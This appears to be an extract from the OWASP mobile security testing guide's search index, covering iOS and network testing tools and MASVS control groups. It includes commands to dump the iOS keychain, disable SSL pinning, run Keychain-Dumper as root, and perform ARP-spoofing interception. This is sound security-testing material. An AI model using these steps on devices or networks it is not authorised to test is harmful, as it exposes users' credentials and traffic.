Start Cydia and add Frida's repository by navigating to Manage -> Sources -> Edit -> Add and entering https://build.frida.re. You should then be able to find and install the Frida package.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0039/#using-frida-on-ios","title":"Using Frida on iOS","text":"Connect your device via USB and make sure that Frida works by running the frida-ps
command and the flag '-U'. This should return the list of processes running on the device:
$ frida-ps -U\nPID Name\n--- ----------------\n963 Mail\n952 Safari\n416 BTServer\n422 BlueTool\n791 CalendarWidget\n451 CloudKeychainPro\n239 CommCenter\n764 ContactsCoreSpot\n(...)\n
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0039/#frida-bindings","title":"Frida Bindings","text":"In order to extend the scripting experience, Frida offers bindings to programming languages such as Python, C, NodeJS, and Swift.
Taking Python as an example, the first thing to note is that no further installation steps are required. Start your Python script with import frida
and you're ready to go. See the following script that simply runs the previous JavaScript snippet:
# frida_python.py\nimport frida\n\nsession = frida.get_usb_device().attach('com.android.chrome')\n\nsource = \"\"\"\nJava.perform(function () {\n var view = Java.use(\"android.view.View\");\n var methods = view.class.getMethods();\n for(var i = 0; i < methods.length; i++) {\n console.log(methods[i].toString());\n }\n});\n\"\"\"\n\nscript = session.create_script(source)\nscript.load()\n\nsession.detach()\n
In this case, running the Python script (python3 frida_python.py
) has the same result as the previous example: it will print all methods of the android.view.View
class to the terminal. However, you might want to work with that data from Python. Using send
instead of console.log
will send data in JSON format from JavaScript to Python. Please read the comments in the example below:
# python3 frida_python_send.py\nimport frida\n\nsession = frida.get_usb_device().attach('com.android.chrome')\n\n# 1. we want to store method names inside a list\nandroid_view_methods = []\n\nsource = \"\"\"\nJava.perform(function () {\n var view = Java.use(\"android.view.View\");\n var methods = view.class.getMethods();\n for(var i = 0; i < methods.length; i++) {\n send(methods[i].toString());\n }\n});\n\"\"\"\n\nscript = session.create_script(source)\n\n# 2. this is a callback function, only method names containing \"Text\" will be appended to the list\ndef on_message(message, data):\n if \"Text\" in message['payload']:\n android_view_methods.append(message['payload'])\n\n# 3. we tell the script to run our callback each time a message is received\nscript.on('message', on_message)\n\nscript.load()\n\n# 4. we do something with the collected data, in this case we just print it\nfor method in android_view_methods:\n print(method)\n\nsession.detach()\n
This effectively filters the methods and prints only the ones containing the string \"Text\":
$ python3 frida_python_send.py\npublic boolean android.view.View.canResolveTextAlignment()\npublic boolean android.view.View.canResolveTextDirection()\npublic void android.view.View.setTextAlignment(int)\npublic void android.view.View.setTextDirection(int)\npublic void android.view.View.setTooltipText(java.lang.CharSequence)\n...\n
In the end, it is up to you to decide where would you like to work with the data. Sometimes it will be more convenient to do it from JavaScript and in other cases Python will be the best choice. Of course you can also send messages from Python to JavaScript by using script.post
. Refer to the Frida docs for more information about sending and receiving messages.
By running MobSF locally on a macOS host you'll benefit from a slightly better class-dump output.
Once you have MobSF up and running you can open it in your browser by navigating to http://127.0.0.1:8000. Simply drag the IPA you want to analyze into the upload area and MobSF will start its job.
After MobSF is done with its analysis, you will receive a one-page overview of all the tests that were executed. The page is split up into multiple sections giving some first hints on the attack surface of the application.
The following is displayed:
Info.plist
file.Info.plist
which give some hints on the app's permissions.In contrast to the Android use case, MobSF does not offer any dynamic analysis features for iOS apps.
Refer to MobSF documentation for more details.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0041/","title":"nm - iOS","text":"nm is a tool that displays the name list (symbol table) of the given binary. You can find more information for iOS here.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0042/","title":"BinaryCookieReader","text":"A tool to dump all the cookies from the binary Cookies.binarycookies file - https://github.com/as0ler/BinaryCookieReader/blob/master/BinaryCookieReader.py
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0043/","title":"class-dump","text":"class-dump by Steve Nygard is a command line utility for examining the Objective-C runtime information stored in Mach-O (Mach object) files. It generates declarations for the classes, categories, and protocols.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0044/","title":"class-dump-z","text":"class-dump-z is class-dump re-written from scratch in C++, avoiding the use of dynamic calls. Removing these unnecessary calls makes class-dump-z nearly 10 times faster than its predecessor.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0045/","title":"class-dump-dyld","text":"class-dump-dyld by Elias Limneos allows symbols to be dumped and retrieved directly from the shared cache, eliminating the necessity of extracting the files first. It can generate header files from app binaries, libraries, frameworks, bundles, or the whole dyld_shared_cache. Directories or the entirety of dyld_shared_cache can be recursively mass-dumped.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0046/","title":"Cycript","text":"Cydia Substrate (formerly called MobileSubstrate) is the standard framework for developing Cydia runtime patches (the so-called \"Cydia Substrate Extensions\") on iOS. It comes with Cynject, a tool that provides code injection support for C.
Cycript is a scripting language developed by Jay Freeman (aka Saurik). It injects a JavaScriptCore VM into a running process. Via the Cycript interactive console, users can then manipulate the process with a hybrid Objective-C++ and JavaScript syntax. Accessing and instantiating Objective-C classes inside a running process is also possible.
In order to install Cycript, first download, unpack, and install the SDK.
#on iphone\n$ wget https://cydia.saurik.com/api/latest/3 -O cycript.zip && unzip cycript.zip\n$ sudo cp -a Cycript.lib/*.dylib /usr/lib\n$ sudo cp -a Cycript.lib/cycript-apl /usr/bin/cycript\n
To spawn the interactive Cycript shell, run \"./cycript\" or \"cycript\" if Cycript is on your path.
$ cycript\ncy#\n
To inject into a running process, we first need to find the process ID (PID). Run the application and make sure the app is in the foreground. Running cycript -p <PID>
injects Cycript into the process. To illustrate, we will inject into SpringBoard (which is always running).
$ ps -ef | grep SpringBoard\n501 78 1 0 0:00.00 ?? 0:10.57 /System/Library/CoreServices/SpringBoard.app/SpringBoard\n$ ./cycript -p 78\ncy#\n
One of the first things you can try out is to get the application instance (UIApplication
), you can use Objective-C syntax:
cy# [UIApplication sharedApplication]\ncy# var a = [UIApplication sharedApplication]\n
Use that variable now to get the application's delegate class:
cy# a.delegate\n
Let's try to trigger an alert message on SpringBoard with Cycript.
cy# alertView = [[UIAlertView alloc] initWithTitle:@\"OWASP MASTG\" message:@\"Mobile Application Security Testing Guide\" delegate:nil cancelButtonitle:@\"OK\" otherButtonTitles:nil]\n#\"<UIAlertView: 0x1645c550; frame = (0 0; 0 0); layer = <CALayer: 0x164df160>>\"\ncy# [alertView show]\ncy# [alertView release]\n
Find the app's document directory with Cycript:
cy# [[NSFileManager defaultManager] URLsForDirectory:NSDocumentDirectory inDomains:NSUserDomainMask][0]\n#\"file:///var/mobile/Containers/Data/Application/A8AE15EE-DC8B-4F1C-91A5-1FED35212DF/Documents/\"\n
The command [[UIApp keyWindow] recursiveDescription].toString()
returns the view hierarchy of keyWindow
. The description of every subview and sub-subview of keyWindow
is shown. The indentation space reflects the relationships between views. For example, UILabel
, UITextField
, and UIButton
are subviews of UIView
.
cy# [[UIApp keyWindow] recursiveDescription].toString()\n`<UIWindow: 0x16e82190; frame = (0 0; 320 568); gestureRecognizers = <NSArray: 0x16e80ac0>; layer = <UIWindowLayer: 0x16e63ce0>>\n | <UIView: 0x16e935f0; frame = (0 0; 320 568); autoresize = W+H; layer = <CALayer: 0x16e93680>>\n | | <UILabel: 0x16e8f840; frame = (0 40; 82 20.5); text = 'i am groot!'; hidden = YES; opaque = NO; autoresize = RM+BM; userInteractionEnabled = NO; layer = <_UILabelLayer: 0x16e8f920>>\n | | <UILabel: 0x16e8e030; frame = (0 110.5; 320 20.5); text = 'A Secret Is Found In The ...'; opaque = NO; autoresize = RM+BM; userInteractionEnabled = NO; layer = <_UILabelLayer: 0x16e8e290>>\n | | <UITextField: 0x16e8fbd0; frame = (8 141; 304 30); text = ''; clipsToBounds = YES; opaque = NO; autoresize = RM+BM; gestureRecognizers = <NSArray: 0x16e94550>; layer = <CALayer: 0x16e8fea0>>\n | | | <_UITextFieldRoundedRectBackgroundViewNeue: 0x16e92770; frame = (0 0; 304 30); opaque = NO; autoresize = W+H; userInteractionEnabled = NO; layer = <CALayer: 0x16e92990>>\n | | <UIButton: 0x16d901e0; frame = (8 191; 304 30); opaque = NO; autoresize = RM+BM; layer = <CALayer: 0x16d90490>>\n | | | <UIButtonLabel: 0x16e72b70; frame = (133 6; 38 18); text = 'Verify'; opaque = NO; userInteractionEnabled = NO; layer = <_UILabelLayer: 0x16e974b0>>\n | | <_UILayoutGuide: 0x16d92a00; frame = (0 0; 0 20); hidden = YES; layer = <CALayer: 0x16e936b0>>\n | | <_UILayoutGuide: 0x16d92c10; frame = (0 568; 0 0); hidden = YES; layer = <CALayer: 0x16d92cb0>>`\n
You can also use Cycript's built-in functions such as choose
which searches the heap for instances of the given Objective-C class:
cy# choose(SBIconModel)\n[#\"<SBIconModel: 0x1590c8430>\"]\n
Learn more in the Cycript Manual.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0047/","title":"Cydia","text":"Cydia is an alternative app store developed by Jay Freeman (aka \"saurik\") for jailbroken devices. It provides a graphical user interface and a version of the Advanced Packaging Tool (APT). You can easily access many \"unsanctioned\" app packages through Cydia. Most jailbreaks install Cydia automatically.
Many tools on a jailbroken device can be installed by using Cydia, which is the unofficial AppStore for iOS devices and allows you to manage repositories. In Cydia you should add (if not already done by default) the following repositories by navigating to Sources -> Edit, then clicking Add in the top left:
In case you are using the Sileo App Store, please keep in mind that the Sileo Compatibility Layer shares your sources between Cydia and Sileo, however, Cydia is unable to remove sources added in Sileo, and Sileo is unable to remove sources added in Cydia. Keep this in mind when you\u2019re trying to remove sources.
After adding all the suggested repositories above you can install the following useful packages from Cydia to get started:
installipa
and ipainstaller
which are both the same.Besides Cydia you can also ssh into your iOS device and you can install the packages directly via apt-get, like for example adv-cmds.
apt-get update\napt-get install adv-cmds\n
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0048/","title":"dsdump","text":"dsdump is a tool to dump Objective-C classes and Swift type descriptors (classes, structs, enums). It only supports Swift version 5 or higher and does not support ARM 32-bit binaries.
The following example shows how you can dump Objective-C classes and Swift type descriptors of an iOS application.
First verify if the app's main binary is a FAT binary containing ARM64:
$ otool -hv [APP_MAIN_BINARY_FILE]\nMach header\n magic cputype cpusubtype caps filetype ncmds sizeofcmds flags\n MH_MAGIC ARM V7 0x00 EXECUTE 39 5016 NOUNDEFS DYLDLINK TWOLEVEL PIE\nMach header\n magic cputype cpusubtype caps filetype ncmds sizeofcmds flags\nMH_MAGIC_64 ARM64 ALL 0x00 EXECUTE 38 5728 NOUNDEFS DYLDLINK TWOLEVEL PIE\n
If yes, then we specify the \"--arch\" parameter to \"arm64\", otherwise it is not needed if the binary only contains an ARM64 binary.
# Dump the Objective-C classes to a temporary file\n$ dsdump --objc --color --verbose=5 --arch arm64 --defined [APP_MAIN_BINARY_FILE] > /tmp/OBJC.txt\n\n# Dump the Swift type descriptors to a temporary file if the app is implemented in Swift\n$ dsdump --swift --color --verbose=5 --arch arm64 --defined [APP_MAIN_BINARY_FILE] > /tmp/SWIFT.txt\n
You can find more information about the inner workings of dsdump and how to programmatically inspect a Mach-O binary to display the compiled Swift types and Objective-C classes in this article.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0049/","title":"Frida-cycript","text":"A fork of Cycript including a brand new runtime called Mj\u00f8lner powered by Frida. This enables frida-cycript to run on all the platforms and architectures maintained by frida-core - https://github.com/nowsecure/frida-cycript
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0050/","title":"Frida-ios-dump","text":"Frida-ios-dump is a Python script that helps you retrieve the decrypted version of an iOS app (IPA) from an iOS device. It supports both Python 2 and Python 3 and requires Frida running on your iOS device (jailbroken or not). This tool uses Frida's Memory API to dump the memory of the running app and recreate an IPA file. Because the code is extracted from memory, it is automatically decrypted.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0050/#alternatives","title":"Alternatives","text":"Bagbak is a Node.js script that decrypts the entire application, including its extensions. It serves the same purpose as frida-ios-dump, but you might find it easier to set up and more convenient for regular use.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0051/","title":"gdb","text":"A tool to perform runtime analysis of iOS applications - https://cydia.radare.org/pool/main/g/gdb/
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0053/","title":"iOSbackup","text":"iOSbackup
is a Python 3 class that reads and extracts files from a password-encrypted iOS backup created by iTunes on Mac and Windows.
With ios-deploy you can install and debug iOS apps from the command line, without using Xcode. It can be installed via brew on macOS:
brew install ios-deploy\n
Alternatively:
git clone https://github.com/ios-control/ios-deploy.git\ncd ios-deploy/\nxcodebuild\ncd build/Release\n./ios-deploy\nln -s <your-path-to-ios-deploy>/build/Release/ios-deploy /usr/local/bin/ios-deploy\n
The last line creates a symbolic link and makes the executable available system-wide. Reload your shell to make the new commands available:
zsh: # . ~/.zshrc\nbash: # . ~/.bashrc\n
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0055/","title":"iProxy","text":"A tool used to connect via SSH to a jailbroken iPhone via USB - https://github.com/tcurdt/iProxy
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0056/","title":"Keychain-Dumper","text":"Keychain-dumper is an iOS tool to check which keychain items are available to an attacker once an iOS device has been jailbroken. The easiest way to get the tool is to download the binary from its GitHub repo and run it from your device:
$ git clone https://github.com/ptoomey3/Keychain-Dumper\n$ scp -P 2222 Keychain-Dumper/keychain_dumper root@localhost:/tmp/\n$ ssh -p 2222 root@localhost\niPhone:~ root# chmod +x /tmp/keychain_dumper\niPhone:~ root# /tmp/keychain_dumper\n
For usage instructions please refer to the Keychain-dumper GitHub page.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0057/","title":"lldb","text":"A debugger by Apple's Xcode used for debugging iOS applications - https://lldb.llvm.org/
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0058/","title":"MachoOView","text":"MachoOView is a useful visual Mach-O file browser that also allows in-file editing of ARM binaries.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0059/","title":"optool","text":"optool is a tool which interfaces with MachO binaries in order to insert/remove load commands, strip code signatures, resign, and remove aslr.
To install it:
git clone https://github.com/alexzielenski/optool.git\ncd optool/\ngit submodule update --init --recursive\nxcodebuild\nln -s <your-path-to-optool>/build/Release/optool /usr/local/bin/optool\n
The last line creates a symbolic link and makes the executable available system-wide. Reload your shell to make the new commands available:
zsh: # . ~/.zshrc\nbash: # . ~/.bashrc\n
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0060/","title":"otool","text":"otool is a tool for displaying specific parts of object files or libraries. It works with Mach-O files and universal file formats.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0061/","title":"Grapefruit","text":"Grapefruit is an iOS app assessment tool that is using the Frida server on the iOS device and is abstracting many penetration testing tasks into a Web UI. It can be installed via npm
.
$ npm install -g igf\n$ grapefruit\nlistening on http://localhost:31337\n
When you execute the command grapefruit
a local server will be started on port 31337. Connect your jailbroken device with the Frida server running, or a non-jailbroken device with a repackaged app including Frida to your machine via USB. Once you click on the \"iPhone\" icon you will get an overview of all installed apps.
With Grapefruit it's possible to explore different kinds of information concerning an iOS app. Once you have selected the iOS app you can perform many tasks such as:
A program that can convert .plist files between a binary version and an XML version - https://www.theiphonewiki.com/wiki/Plutil
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0063/","title":"security","text":"security
is a macOS command to administer Keychains, keys, certificates and the Security framework.
Since iOS 11 jailbreaks are introducing Sileo, which is a new jailbreak app-store for iOS devices. The jailbreak Chimera for iOS 12 is also relying on Sileo as a package manager.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0065/","title":"simctl","text":"simctl is an Xcode tool that allows you to interact with iOS simulators via the command line to e.g. manage simulators, launch apps, take screenshots or collect their logs.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0066/","title":"SSL Kill Switch 3","text":"Blackbox tool to disable SSL certificate validation - including certificate pinning - within iOS and macOS Apps - https://github.com/NyaMisty/ssl-kill-switch3
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0067/","title":"swift-demangle","text":"swift-demangle is an Xcode tool that demangles Swift symbols. For more information run xcrun swift-demangle -help
once installed.
SwiftShield is a tool that generates irreversible, encrypted names for your iOS project's objects (including your Pods and Storyboards). This raises the bar for reverse engineers and will produce less helpful output when using reverse engineering tools such as class-dump and Frida.
Warning: SwiftShield irreversibly overwrites all your source files. Ideally, you should have it run only on your CI server, and on release builds.
A sample Swift project is used to demonstrate the usage of SwiftShield.
/usr/local/bin
:cp swiftshield/swiftshield /usr/local/bin/\n
$ cd SwiftSecurity\n$ swiftshield -automatic -project-root . -automatic-project-file SwiftSecurity.xcodeproj -automatic-project-scheme SwiftSecurity\nSwiftShield 3.4.0\nAutomatic mode\nBuilding project to gather modules and compiler arguments...\n-- Indexing ReverseEngineeringToolsChecker.swift --\nFound declaration of ReverseEngineeringToolsChecker (s:13SwiftSecurity30ReverseEngineeringToolsCheckerC)\nFound declaration of amIReverseEngineered (s:13SwiftSecurity30ReverseEngineeringToolsCheckerC20amIReverseEngineeredSbyFZ)\nFound declaration of checkDYLD (s:13SwiftSecurity30ReverseEngineeringToolsCheckerC9checkDYLD33_D6FE91E9C9AEC4D13973F8ABFC1AC788LLSbyFZ)\nFound declaration of checkExistenceOfSuspiciousFiles (s:13SwiftSecurity30ReverseEngineeringToolsCheckerC31checkExistenceOfSuspiciousFiles33_D6FE91E9C9AEC4D13973F8ABFC1AC788LLSbyFZ)\n...\n
SwiftShield is now detecting class and method names and is replacing their identifier with an encrypted value.
In the original source code you can see all the class and method identifiers:
SwiftShield was now replacing all of them with encrypted values that leave no trace to their original name or intention of the class/method:
After executing swiftshield
a new directory will be created called swiftshield-output
. In this directory another directory is created with a timestamp in the folder name. This directory contains a text file called conversionMap.txt
, that maps the encrypted strings to their original values.
$ cat conversionMap.txt\n//\n// SwiftShield Conversion Map\n// Automatic mode for SwiftSecurity, 2020-01-02 13.51.03\n// Deobfuscate crash logs (or any text file) by running:\n// swiftshield -deobfuscate CRASH_FILE -deobfuscate_map THIS_FILE\n//\n\nViewController ===> hTOUoUmUcEZUqhVHRrjrMUnYqbdqWByU\nviewDidLoad ===> DLaNRaFbfmdTDuJCPFXrGhsWhoQyKLnO\nsceneDidBecomeActive ===> SUANAnWpkyaIWlGUqwXitCoQSYeVilGe\nAppDelegate ===> KftEWsJcctNEmGuvwZGPbusIxEFOVcIb\nDeny_Debugger ===> lKEITOpOvLWCFgSCKZdUtpuqiwlvxSjx\nButton_Emulator ===> akcVscrZFdBBYqYrcmhhyXAevNdXOKeG\n
This is needed for deobfuscating encrypted crash logs.
Another example project is available in SwiftShield's Github repo, that can be used to test the execution of SwiftShield.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0069/","title":"Usbmuxd","text":"usbmuxd is a socket daemon that monitors USB iPhone connections. You can use it to map the mobile device's localhost listening sockets to TCP ports on your host computer. This allows you to conveniently SSH into your iOS device without setting up an actual network connection. When usbmuxd detects an iPhone running in normal mode, it connects to the phone and begins relaying requests that it receives via /var/run/usbmuxd
.
Xcode is an Integrated Development Environment (IDE) for macOS that contains a suite of tools for developing software for macOS, iOS, watchOS, and tvOS. You can download Xcode for free from the official Apple website. Xcode will offer you different tools and functions to interact with an iOS device that can be helpful during a penetration test, such as analyzing logs or sideloading of apps.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0071/","title":"Xcode Command Line Tools","text":"After installing Xcode, in order to make all development tools available systemwide, it is recommended to install the Xcode Command Line Tools package. This will be handy during testing of iOS apps as some of the tools (e.g. objection) are also relying on the availability of this package. You can download it from the official Apple website or install it straight away from your terminal:
xcode-select --install\n
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0072/","title":"xcrun","text":"xcrun
can be used to invoke Xcode developer tools from the command-line, without having them in the path. For example you may want to use it to locate and run swift-demangle or simctl.
Radare2 is a complete framework for reverse-engineering and analyzing binaries. The installation instructions can be found in the GitHub repository. To learn more on radare2 you may want to read the official radare2 book.
Learn more:
Objection offers several features specific to iOS. You can find the full list of features on the project's page, but here are a few interesting ones:
All these tasks and more can be easily done by using the commands in objection's REPL. For example, you can obtain the classes used in an app, functions of classes or information about the bundles of an app by running:
OWASP.iGoat-Swift on (iPhone: 12.0) [usb] # ios hooking list classes\nOWASP.iGoat-Swift on (iPhone: 12.0) [usb] # ios hooking list class_methods <ClassName>\nOWASP.iGoat-Swift on (iPhone: 12.0) [usb] # ios bundles list_bundles\n
If you have a jailbroken device with frida-server installed, Objection can connect directly to the running Frida server to provide all its functionality without needing to repackage the application. However, it is not always possible to jailbreak the latest version of iOS, or you may have an application with advanced jailbreak detection mechanisms.
The ability to perform advanced dynamic analysis on non-jailbroken devices is one of the features that makes Objection incredibly useful. After following the repackaging process you will be able to run all the aforementioned commands which make it very easy to quickly analyze an application, or get around basic security controls.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0074/#using-objection-on-ios","title":"Using Objection on iOS","text":"Starting up Objection depends on whether you've patched the IPA or whether you are using a jailbroken device running Frida-server. For running a patched IPA, objection will automatically find any attached devices and search for a listening Frida gadget. However, when using frida-server, you need to explicitly tell frida-server which application you want to analyze.
# Connecting to a patched IPA\n$ objection explore\n\n# Using frida-ps to get the correct application name\n$ frida-ps -Ua | grep -i Telegram\n983 Telegram\n\n# Connecting to the Telegram app through Frida-server\n$ objection --gadget=\"Telegram\" explore\n
Once you are in the Objection REPL, you can execute any of the available commands. Below is an overview of some of the most useful ones:
# Show the different storage locations belonging to the app\n$ env\n\n# Disable popular ssl pinning methods\n$ ios sslpinning disable\n\n# Dump the Keychain\n$ ios keychain dump\n\n# Dump the Keychain, including access modifiers. The result will be written to the host in myfile.json\n$ ios keychain dump --json <myfile.json>\n\n# Show the content of a plist file\n$ ios plist cat <myfile.plist>\n
More information on using the Objection REPL can be found on the Objection Wiki
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0101/","title":"codesign","text":"The codesign tool is primarily used to create, verify, and display code signatures, and to query the dynamic status of signed code in the system. Although Xcode typically automates the process of signing code during builds and before distribution, there are scenarios where manual intervention with codesign is required. This can include inspecting or verifying the details of an app's code signature, or manually re-signing an app. For more detailed tasks such as these, you can use the codesign command line tool directly, as described in Apple's Code Signing Guide.
Learn more:
A command line packet capture utility for Android.
"},{"location":"MASTG/tools/network/MASTG-TOOL-0076/","title":"bettercap","text":"A powerful framework which aims to offer to security researchers and reverse engineers an easy to use, all-in-one solution for Wi-Fi, Bluetooth Low Energy, wireless HID hijacking and Ethernet networks reconnaissance. It can be used during network penetration tests in order to simulate a man-in-the-middle (MITM) attack. This is achieved by executing ARP poisoning or spoofing to the target computers. When such an attack is successful, all packets between two computers are redirected to a third computer that acts as the man-in-the-middle and is able to intercept the traffic for analysis.
bettercap is a powerful tool to execute MITM attacks and should be preferred nowadays, instead of ettercap. See also Why another MITM tool? on the bettercap site.
bettercap is available for all major Linux and Unix operating systems and should be part of their respective package installation mechanisms. You need to install it on your host computer that will act as the MITM. On macOS it can be installed by using brew.
brew install bettercap\n
For Kali Linux you can install bettercap with apt-get
:
apt-get update\napt-get install bettercap\n
There are installation instructions as well for Ubuntu Linux 18.04 on LinuxHint.
"},{"location":"MASTG/tools/network/MASTG-TOOL-0077/","title":"Burp Suite","text":"Burp Suite is an integrated platform for performing security testing of mobile and web applications.
Its tools work together seamlessly to support the entire testing process, from initial mapping and analysis of attack surfaces to finding and exploiting security vulnerabilities. Burp Proxy operates as a web proxy server for Burp Suite, which is positioned as a man-in-the-middle between the browser and web servers. Burp Suite allows you to intercept, inspect, and modify incoming and outgoing raw HTTP traffic.
Setting up Burp to proxy your traffic is pretty straightforward. We assume that both your device and host computer are connected to a Wi-Fi network that permits client-to-client traffic.
PortSwigger provides good tutorials on setting up both Android and iOS devices to work with Burp:
Please refer to the section \"Setting up an Interception Proxy\" in the Android and iOS \"Basic Security Testing\" chapters for more information.
"},{"location":"MASTG/tools/network/MASTG-TOOL-0078/","title":"MITM Relay","text":"A script to intercept and modify non-HTTP protocols through Burp and others with support for SSL and STARTTLS interception - https://github.com/jrmdev/mitm_relay
"},{"location":"MASTG/tools/network/MASTG-TOOL-0079/","title":"OWASP ZAP","text":"OWASP ZAP (Zed Attack Proxy) is a free security tool which helps to automatically find security vulnerabilities in web applications and web services.
"},{"location":"MASTG/tools/network/MASTG-TOOL-0080/","title":"tcpdump","text":"A command line packet capture utility - https://www.tcpdump.org/
"},{"location":"MASTG/tools/network/MASTG-TOOL-0081/","title":"Wireshark","text":"An open-source packet analyzer - https://www.wireshark.org/download.html
"},{"location":"MASTG/tools/network/MASTG-TOOL-0097/","title":"mitmproxy","text":"mitmproxy is a free and open source interactive HTTPS intercepting proxy.
mitmdump
is the command-line version of mitmproxy. Think tcpdump for HTTP. It can be used to intercept, inspect, modify and replay web traffic such as HTTP/1, HTTP/2, WebSockets, or any other SSL/TLS-protected protocols. You can prettify and decode a variety of message types ranging from HTML to Protobuf, intercept specific messages on-the-fly, modify them before they reach their destination, and replay them to a client or server later on.mitmweb
is a web-based interface for mitmproxy. It gives you a similar experience as in Chrome's DevTools, plus additional features such as request interception and replay.brew install mitmproxy\n
The installation instructions are here.
"},{"location":"MASTG/tools/network/MASTG-TOOL-0097/#usage","title":"Usage","text":"The documentation is here. Mitmproxy starts as a regular HTTP proxy by default and listens on http://localhost:8080
. You need to configure your browser or device to route all traffic through mitmproxy. For example, on Android emulator you need to follow the steps indicated here.
For example, to capture all traffic to a file:
mitmdump -w outfile\n
This runs mitmproxy with the add_header.py script, which simply adds a new header to all responses.
mitmdump -s add_header.py\n
"},{"location":"MASVS/","title":"OWASP MASVS","text":"GitHub Repo
The OWASP MASVS (Mobile Application Security Verification Standard) is the industry standard for mobile app security. It can be used by mobile software architects and developers seeking to develop secure mobile applications, as well as security testers to ensure completeness and consistency of test results.
Download the MASVS
Starting with MASVS v2.0.0, translations will no longer be included to focus on the development of MASTG v2.0.0. We encourage the community to create and maintain their own translations. Thank you to all the past translators who generously volunteered their time and expertise to make the MASVS accessible to non-English speaking communities. We truly appreciate your contributions and hope to continue working together in the future. The past MASVS v1.5.0 translations are still available in the MASVS repo.
"},{"location":"MASVS/#the-masvs-control-groups","title":"The MASVS Control Groups","text":"The standard is divided into various groups of controls, labeled MASVS-XXXXX, that represent the most critical areas of the mobile attack surface:
To complement the MASVS, the OWASP MAS project also provides the OWASP Mobile Application Security Testing Guide (MASTG) and the OWASP MAS Checklist which together are the perfect companion for verifying the controls listed in the OWASP MASVS and demonstrate compliance.
MAS Testing Profiles
Starting on v2.0.0 the MASVS does not contain \"verification levels\". The MAS project has traditionally provided three verification levels (L1, L2 and R), which were revisited during the MASVS refactoring in 2023, and have been reworked as \"MAS Testing Profiles\" and moved over to the OWASP MASTG. While we move things around and as a temporary measure, the OWASP MAS Checklist will still contain the old verification levels, associated with the current MASTG v1 tests. However, note that the levels will be completely reworked and reassigned to the corresponding MASTG tests in the next release.
"},{"location":"MASVS/05-MASVS-STORAGE/","title":"MASVS-STORAGE: Storage","text":"Mobile applications handle a wide variety of sensitive data, such as personally identifiable information (PII), cryptographic material, secrets, and API keys, that often need to be stored locally. This sensitive data may be stored in private locations, such as the app's internal storage, or in public folders that are accessible by the user or other apps installed on the device. However, sensitive data can also be unintentionally stored or exposed to publicly accessible locations, typically as a side-effect of using certain APIs or system capabilities such as backups or logs.
This category is designed to help developers ensure that any sensitive data intentionally stored by the app is properly protected, regardless of the target location. It also covers unintentional leaks that can occur due to improper use of APIs or system capabilities.
"},{"location":"MASVS/06-MASVS-CRYPTO/","title":"MASVS-CRYPTO: Cryptography","text":"Cryptography is essential for mobile apps because mobile devices are highly portable and can be easily lost or stolen. This means that an attacker who gains physical access to a device can potentially access all the sensitive data stored on it, including passwords, financial information, and personally identifiable information. Cryptography provides a means of protecting this sensitive data by encrypting it so that it cannot be easily read or accessed by an unauthorized user.
The purpose of the controls in this category is to ensure that the verified app uses cryptography according to industry best practices, which are typically defined in external standards such as NIST.SP.800-175B and NIST.SP.800-57. This category also focuses on the management of cryptographic keys throughout their lifecycle, including key generation, storage, and protection. Poor key management can compromise even the strongest cryptography, so it is crucial for developers to follow the recommended best practices to ensure the security of their users' sensitive data.
"},{"location":"MASVS/07-MASVS-AUTH/","title":"MASVS-AUTH: Authentication and Authorization","text":"Authentication and authorization are essential components of most mobile apps, especially those that connect to a remote service. These mechanisms provide an added layer of security and help prevent unauthorized access to sensitive user data. Although the enforcement of these mechanisms must be on the remote endpoint, it is equally important for the app to follow relevant best practices to ensure the secure use of the involved protocols.
Mobile apps often use different forms of authentication, such as biometrics, PIN, or multi-factor authentication code generators, to validate user identity. These mechanisms must be implemented correctly to ensure their effectiveness in preventing unauthorized access. Additionally, some apps may rely solely on local app authentication and may not have a remote endpoint. In such cases, it is critical to ensure that local authentication mechanisms are secure and implemented following industry best practices.
The controls in this category aim to ensure that the app implements authentication and authorization mechanisms securely, protecting sensitive user information and preventing unauthorized access. It is important to note that the security of the remote endpoint should also be validated using industry standards such as the OWASP Application Security Verification Standard (ASVS).
"},{"location":"MASVS/08-MASVS-NETWORK/","title":"MASVS-NETWORK: Network Communication","text":"Secure networking is a critical aspect of mobile app security, particularly for apps that communicate over the network. In order to ensure the confidentiality and integrity of data in transit, developers typically rely on encryption and authentication of the remote endpoint, such as through the use of TLS. However, there are numerous ways in which a developer may accidentally disable the platform secure defaults or bypass them entirely by utilizing low-level APIs or third-party libraries.
This category is designed to ensure that the mobile app sets up secure connections under any circumstances. Specifically, it focuses on verifying that the app establishes a secure, encrypted channel for network communication. Additionally, this category covers situations where a developer may choose to trust only specific Certificate Authorities (CAs), which is commonly referred to as certificate pinning or public key pinning.
